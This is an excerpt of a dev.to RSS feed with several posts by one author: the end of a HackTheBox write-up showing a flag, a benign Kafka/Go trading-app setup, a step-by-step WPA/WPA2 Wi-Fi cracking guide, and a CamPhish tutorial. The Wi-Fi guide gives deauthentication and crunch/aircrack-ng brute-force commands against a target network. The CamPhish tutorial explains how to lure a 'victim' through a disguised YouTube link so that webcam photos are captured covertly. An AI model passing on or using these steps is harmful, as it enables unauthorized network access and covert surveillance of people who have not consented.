&lt;p&gt;The task was not too challenging, and we successfully obtained the flag:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;HTB{l00k_47_y0u_r3v3rs1ng_3qu4710n5_c0ngr475}&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

</description>
      <category>cybersecurity</category>
      <category>hackthebox</category>
      <category>hacking</category>
      <category>reverseengineering</category>
    </item>
    <item>
      <title>Real-Time Trading App: Golang, Kafka, Websockets — Intro &amp; Setup (PART-1)</title>
      <dc:creator>Kamalesh-Seervi</dc:creator>
      <pubDate>Wed, 13 Dec 2023 14:15:09 +0000</pubDate>
      <link>https://dev.to/kamaleshseervi/real-time-trading-app-golang-kafka-websockets-intro-setup-part-1-37fn</link>
      <guid>https://dev.to/kamaleshseervi/real-time-trading-app-golang-kafka-websockets-intro-setup-part-1-37fn</guid>
      <description>&lt;h3&gt;
  
  
  Real-Time Trading App: Golang, Kafka, Websockets — Intro &amp;amp; Setup (PART-1)
&lt;/h3&gt;

&lt;p&gt;High-performance real-time trading engine with Golang, Kafka, and Websockets…&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--hiGd0fqn--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/811/0%2ATliRagkNGkLsJXNu.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--hiGd0fqn--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/811/0%2ATliRagkNGkLsJXNu.jpg" alt="" width="800" height="425"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;This blog will be structured into four parts:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Introduction &amp;amp; Setup&lt;/li&gt;
&lt;li&gt;&lt;a href="https://medium.com/@kkamalesh117/real-time-trading-app-golang-kafka-websockets-setting-up-kafka-in-golang-part-2-3b80e720c6ee"&gt;Golang Integration with Kafka&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Consumer Service &amp;amp; Websockets Implementation&lt;/li&gt;
&lt;li&gt;Frontend Development&lt;/li&gt;
&lt;/ol&gt;

&lt;h4&gt;
  
  
  System Design
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--sjEAcZ9Q--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/688/0%2AvGo8oYrIid85jOmM.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--sjEAcZ9Q--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/688/0%2AvGo8oYrIid85jOmM.jpg" alt="kafka architecture" width="688" height="368"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;This article serves as a comprehensive guide to building a real-time trading platform using Golang, Kafka, and Websockets. Let’s delve into the rationale behind our choice of components:&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;1. Golang:&lt;/strong&gt; Golang’s direct compilation to machine code and its simplicity make it an ideal choice for low-latency systems. While debates exist about language preferences, Golang stands out for its efficiency and effectiveness in getting the job done.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Kafka:&lt;/strong&gt; Despite the bidirectional capabilities of Websockets, we opt for Kafka for two key reasons. Firstly, Websockets solely facilitate data exchange without data storage capabilities. For timely financial data analysis, multiple services may be necessary. Secondly, Kafka’s distributed architecture aligns seamlessly with stock market platforms operating across various countries.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Websockets:&lt;/strong&gt; The need for Websockets arises from Kafka’s default design for multi-host environments. In Kafka, a single partition cannot be subscribed to by more than one consumer. This poses challenges when multiple tabs of the same app are open, as each tab receives messages sequentially. Additionally, the scarcity of client-side libraries for Kafka, especially for the web, makes Websockets a more practical choice across various platforms.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Web App:&lt;/strong&gt; For the web application, we’ve chosen ReactJS to craft an intuitive and responsive user interface. Leveraging the power of React components and its virtual DOM, we aim to create a seamless and interactive trading experience. The real-time data received from Kafka via Websockets will be efficiently rendered using React components.&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Setup&lt;/strong&gt;
&lt;/h4&gt;

&lt;blockquote&gt;
&lt;p&gt;Let’s kick off the implementation. We’ll utilize &lt;a href="https://github.com/binance/binance-spot-api-docs/blob/master/web-socket-streams.md"&gt;Binance’s open-source&lt;/a&gt; WebSocket connection to establish our data source. We’ll subscribe to the following tickers to receive real-time updates:&lt;br&gt;
&lt;/p&gt;
&lt;/blockquote&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;btcusdt,ethusdt,busdusdt,bnbusdt,ltcusdt,xrpusdt,maticusdt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now that we have decided on our data source, it’s time to set up Kafka.&lt;br&gt;&lt;br&gt;
I will be using docker images from bitnami.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;version: '3.8'
services:
  zookeeper:
    env_file:
    - ./.env
    image: bitnami/zookeeper
    expose:
    - "2181"
    ports:
    - "2181:2181"

  kafka:
    image: bitnami/kafka
    env_file:
    - ./.env
    depends_on:
    - zookeeper
    ports:
    - '9092:9092'
    environment:
      KAFKA_ADVERTISED_LISTENERS: INSIDE://kafka:9093,OUTSIDE://localhost:9092
      KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: INSIDE:PLAINTEXT,OUTSIDE:PLAINTEXT
      KAFKA_LISTENERS: INSIDE://0.0.0.0:9093,OUTSIDE://0.0.0.0:9092
      KAFKA_INTER_BROKER_LISTENER_NAME: INSIDE
      KAFKA_ZOOKEEPER_CONNECT: "zookeeper:2181"
      KAFKA_BROKER_ID: 1  
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;To commence, we’ll set up two essential services: Zookeeper and Kafka. For those unfamiliar with Zookeeper, it serves as a centralized cluster management system developed by Apache. Typically employed in distributed systems, Zookeeper plays a crucial role in addressing questions related to Kafka’s operation, including:&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ol&gt;
&lt;li&gt;Determining the broker responsible for handling the publish/subscribe functionality for a given topic and partition.&lt;/li&gt;
&lt;li&gt;Managing the count of nodes or server instances available in the cluster.&lt;/li&gt;
&lt;li&gt;Providing insights into available topics, data retention settings, and more.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;While this provides a brief overview, you can delve deeper into Zookeeper’s functionalities &lt;a href="https://zookeeper.apache.org"&gt;here&lt;/a&gt;.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;The question may arise:&lt;/strong&gt;  &lt;strong&gt;why deploy Zookeeper when, for testing and development purposes, we don’t necessarily require multiple nodes?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;While Kafka can technically operate without Zookeeper, it’s essential to note that Apache does not recommend doing so in production environments. Hence, for consistency and best practices, we opt to incorporate Zookeeper from the outset, aligning with Apache’s guidelines for a robust and reliable setup.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Here is the ** .env file**&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;KAFKA_HOST=kafka
KAFKA_PORT=9092

#Zookeeper
ALLOW_ANONYMOUS_LOGIN=yes
ZOO_PORT_NUMBER=2181

#Kafka
KAFKA_CFG_ZOOKEEPER_CONNECT=zookeeper:2181
ALLOW_PLAINTEXT_LISTENER=yes
KAFKA_CFG_ADVERTISED_LISTENERS=PLAINTEXT://kafka:9092

TICKERS="btcusdt,ethusdt,busdusdt,bnbusdt,ltcusdt,xrpusdt,maticusdt"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Proceed with the following command to initiate the setup:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo docker-compose up -d
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;These steps should suffice for configuring Kafka and Zookeeper in your local environment.&lt;/p&gt;

&lt;h4&gt;
  
  
  Conclusion
&lt;/h4&gt;

&lt;blockquote&gt;
&lt;p&gt;We’ve successfully laid the foundation for our real-time trading application by setting up Kafka and Zookeeper in our local environment. In the upcoming week, be on the lookout for &lt;strong&gt;Part 2&lt;/strong&gt; of this series, where we’ll delve into the &lt;strong&gt;integration of Golang with Kafka.&lt;/strong&gt; Stay tuned for a deeper exploration of how these technologies synergize to create a robust and efficient real-time trading platform. &lt;strong&gt;Happy coding!&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://github.com/Kamalesh-Seervi/Real-time-trade-app"&gt;GitHub - Kamalesh-Seervi/Real-time-trade-app: Kafka, WebSockets&lt;/a&gt;&lt;/p&gt;

</description>
      <category>go</category>
      <category>kafka</category>
      <category>cryptocurrency</category>
      <category>trading</category>
    </item>
    <item>
      <title>WPA-WPA2 Wi-Fi Hacking: A Step-by-Step Guide.</title>
      <dc:creator>Kamalesh-Seervi</dc:creator>
      <pubDate>Mon, 20 Nov 2023 17:58:11 +0000</pubDate>
      <link>https://dev.to/kamaleshseervi/wpa-wpa2-wi-fi-hacking-a-step-by-step-guide-2hcf</link>
      <guid>https://dev.to/kamaleshseervi/wpa-wpa2-wi-fi-hacking-a-step-by-step-guide-2hcf</guid>
      <description>&lt;p&gt;&lt;strong&gt;Disclaimer:&lt;/strong&gt; The content provided in this blog is intended for educational purposes only. The information shared here is meant to contribute to the understanding of cybersecurity and ethical hacking in a responsible and legal manner.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--yOO5sRve--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/750/1%2Aq1aUpUM8sHYD9nx98SIfIg.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--yOO5sRve--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/750/1%2Aq1aUpUM8sHYD9nx98SIfIg.jpeg" alt="" width="750" height="422"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Aircrack-ng&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Introduction
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Wi-Fi security is a crucial aspect of digital privacy, and understanding how vulnerabilities can be exploited is essential for network administrators and cybersecurity enthusiasts. In this tutorial, we’ll explore the process of hacking WPA-WPA2-protected Wi-Fi networks for educational purposes using Aircrack-ng on Kali Linux.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Tools Required
&lt;/h3&gt;

&lt;p&gt;Before diving into the process, make sure you have the following tools:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Network Adapter &lt;strong&gt;(e.g., TL-WN722N V2)&lt;/strong&gt; with monitoring mode support.&lt;/li&gt;
&lt;li&gt;Kali Linux installed on your machine.&lt;/li&gt;
&lt;li&gt;Aircrack-ng&lt;/li&gt;
&lt;li&gt;Airodump-ng&lt;/li&gt;
&lt;li&gt;Airmon-ng&lt;/li&gt;
&lt;li&gt;Crunch&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Monitoring Mode Setup
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Step 1: Kill Interrupting Services
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Before enabling monitoring mode, identify and kill services that might interrupt the process:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo airmon-ng check wlan0
sudo airmon-ng check kill
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--NQnxrxU_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/886/0%2ApqzyS99v8xMdV_Ae.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--NQnxrxU_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/886/0%2ApqzyS99v8xMdV_Ae.png" alt="" width="800" height="276"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Step 2: Enable Monitoring Mode
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Stop the WLAN interface and enable monitor mode:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Verify the mode using:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;iwconfig
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--3Sgh3-Zo--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2Ao3HsY17zjyMzBWXf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--3Sgh3-Zo--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2Ao3HsY17zjyMzBWXf.png" alt="" width="800" height="480"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Packet Capture and 4-way Handshake
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Step 3: Capture BSSID and Monitor Network
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Use airodump-ng to capture BSSID information:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;airodump-ng wlan0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--UGLl43O8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/964/0%2Al4noyKgiObJLJdoP.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--UGLl43O8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/964/0%2Al4noyKgiObJLJdoP.jpg" alt="" width="800" height="350"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Select a specific BSSID for monitoring and run:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;airodump-ng -c 1 -w Scan_network --bssid EW:WV:4H:J7:A5:28 wlan0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Xo6utlTg--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/964/0%2AN7RrAanIiseynMGH.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Xo6utlTg--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/964/0%2AN7RrAanIiseynMGH.jpg" alt="" width="800" height="350"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Run the above command in the background.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Step 4: Deauthentication Process
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Deauthenticate the target Wi-Fi to capture the 4-way handshake:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo aireplay-ng -0 0 -a EW:WV:4H:J7:A5:28 wlan0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--7YxQbnww--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AfQcEwRQNgLxKXBWr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--7YxQbnww--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AfQcEwRQNgLxKXBWr.png" alt="" width="800" height="531"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Run the command until you see the 4-way handshake in the background code.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Final Stage: Password Cracking with Crunch and Aircrack-ng
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;After capturing the 4-way handshake, the final step involves cracking the Wi-Fi password using Crunch and aircrack-ng. It's important to note that the success of this process heavily depends on various factors, including the complexity and length of the password.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Using Crunch for Password Generation
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;In this example, I used Crunch to generate possible passwords. Since I knew the Wi-Fi password consisted of only numeric characters, the command was tailored accordingly:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo crunch 8 8 123456780 | aircrack-ng -w - Scan_Kamalesh-01.cap -e KamaleshD
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Ge_KzAM8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2A9GmyQq6dznyCIe2R.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Ge_KzAM8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2A9GmyQq6dznyCIe2R.jpg" alt="" width="800" height="542"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Note:
&lt;/h4&gt;

&lt;blockquote&gt;
&lt;p&gt;Modify the crunch command based on your knowledge of the password, such as adjusting the length or character set.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Password Length and OSINT
&lt;/h3&gt;

&lt;p&gt;If you don’t know the password, attempting to crack it by testing all possible combinations is an extremely time-consuming process. The number of possibilities can be in the billions, making it practically impossible to crack on a standard PC within a reasonable timeframe.&lt;/p&gt;

&lt;p&gt;In such cases, consider leveraging Open Source Intelligence (OSINT) techniques. Analyze social footprints, gather information about the target’s preferences, and try to determine the likely length and complexity of the password. This approach can significantly reduce the search space and increase the chances of successful password guessing.&lt;/p&gt;

&lt;p&gt;Remember, ethical hacking involves responsible and legal use of knowledge. Always respect privacy and adhere to ethical standards when engaging in cybersecurity activities.&lt;/p&gt;

&lt;h3&gt;
  
  
  Conclusion
&lt;/h3&gt;

&lt;p&gt;Ethical hacking involves understanding vulnerabilities to enhance security measures. This guide aims to provide insights into Wi-Fi security, emphasizing responsible and legal use of knowledge. Always respect privacy and adhere to ethical standards when exploring cybersecurity.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/Kamalesh-Seervi/WPA-WPA2-wifi-hacking"&gt;GitHub - Kamalesh-Seervi/WPA-WPA2-wifi-hacking: Aircrack-ng&lt;/a&gt;&lt;/p&gt;

</description>
      <category>hacking</category>
      <category>ethicalhacking</category>
      <category>cybersecurity</category>
      <category>security</category>
    </item>
    <item>
      <title>CamPhish: Understanding and Safeguarding Your Privacy</title>
      <dc:creator>Kamalesh-Seervi</dc:creator>
      <pubDate>Wed, 15 Nov 2023 15:46:13 +0000</pubDate>
      <link>https://dev.to/kamaleshseervi/camphish-understanding-and-safeguarding-your-privacy-2fip</link>
      <guid>https://dev.to/kamaleshseervi/camphish-understanding-and-safeguarding-your-privacy-2fip</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Disclaimer:&lt;/strong&gt; Do not use this technique to hack anyone unless you have permission.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--bYCiRJ6Y--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AShHgRIYC3P9gnwrERd7tPQ.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--bYCiRJ6Y--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AShHgRIYC3P9gnwrERd7tPQ.png" alt="" width="800" height="428"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;To begin, acquire the CamPhish tool by visiting its GitHub page through the provided&lt;a href="https://github.com/techchipnet/CamPhish"&gt;&lt;strong&gt;link&lt;/strong&gt;&lt;/a&gt; &lt;strong&gt;.&lt;/strong&gt; Alternatively, you can obtain it by entering the following command into your terminal.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;git clone https://github.com/techchipnet/CamPhish
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After Installing the tool just run it and you should see the following options&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--txiRlKSN--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AhNUoD1ZKlOW6cbkyhLcM6Q.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--txiRlKSN--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AhNUoD1ZKlOW6cbkyhLcM6Q.png" alt="" width="800" height="428"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;[01] Ngrok&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;You can proceed with any option, but I suggest opting for option 1, which involves using Ngrok. Ngrok is the tool that facilitates exposure in this process.&lt;/p&gt;

&lt;p&gt;Disregard any misconceptions; it’s not what you might be assuming. The purpose is to expose your home network to the Internet. Visit the official Ngrok website, create an account, and obtain your authentication token. Save this token for future use. Next, when prompted to choose a template, I suggest selecting option 2 for the YouTube link, as these options might raise fewer suspicions. Simply choose 2 and press ENTER to proceed.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--r5l3jRy6--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AjGOkIlsO5XqNZ_j8Nfs8_Q.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--r5l3jRy6--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AjGOkIlsO5XqNZ_j8Nfs8_Q.png" alt="" width="800" height="428"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;[02] Live Youtube TV&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Once you opt for the Live YouTube TV option, the system will prompt you to provide a watch ID, which you can obtain directly from YouTube. Here’s a demonstration: pick any video on youtube.com; for instance, I’ll choose the song “What is Love.” Check the URL, and you’ll find the watch ID. Refer to the screenshot below for clarification:&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Original URL:&lt;/strong&gt; &lt;a href="https://www.youtube.com/watch?v=UyQm4O9G7OM&amp;amp;list="&gt;https://www.youtube.com/watch?v=UyQm4O9G7OM&amp;amp;list=&lt;/a&gt; &lt;strong&gt;Extracted ID:&lt;/strong&gt; RDUyQm4O9G7OM&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--1W-9kP3---/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2ATHMIAXRa5_RLTrBuaF5x1Q.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--1W-9kP3---/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2ATHMIAXRa5_RLTrBuaF5x1Q.png" alt="" width="800" height="428"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;watch ID [YouTube]&lt;/em&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;The watch ID is the text following&lt;/em&gt; &lt;em&gt;watch?v=in the URL. Copy this ID and paste it into the terminal when prompted by the program for the watch ID.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Visit the &lt;a href="https://ngrok.com"&gt;&lt;strong&gt;ngork&lt;/strong&gt;&lt;/a&gt; website, create an account, and navigate to the dashboard. Once there, go to “Authtoken,” copy the token, and paste it into the terminal as shown in the image below.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Hdu1jysd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AyHBQDO3bph-g9M8LgGMmkw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Hdu1jysd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AyHBQDO3bph-g9M8LgGMmkw.png" alt="" width="800" height="428"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;ngrok AuthToken&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--MQMKo6Q7--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A9SlNZA3AGICjhAteJZLWnA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--MQMKo6Q7--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A9SlNZA3AGICjhAteJZLWnA.png" alt="" width="800" height="428"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Token ID&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Following this, it will initiate a PHP server and an Ngrok server. You will receive a link that you can then share with your target. To succeed in this, you’ll require social engineering skills to entice clicks on your provided link.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--pWSViwFQ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A2ufy7blH0TwA6TT1shnmRA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--pWSViwFQ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A2ufy7blH0TwA6TT1shnmRA.png" alt="" width="800" height="428"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In the provided Direct link, once the victim clicks on it, they will be directed to a YouTube page featuring the selected song. Simultaneously, a unique process begins, and as depicted in the screenshot below, I successfully obtained images of the victim, securely stored in my CamPhish folder.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--3xS3Pqei--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2ArW9Dm5cua3vzUqgMUIBMpg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--3xS3Pqei--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2ArW9Dm5cua3vzUqgMUIBMpg.png" alt="" width="800" height="353"&gt;&lt;/a&gt;&lt;br&gt;
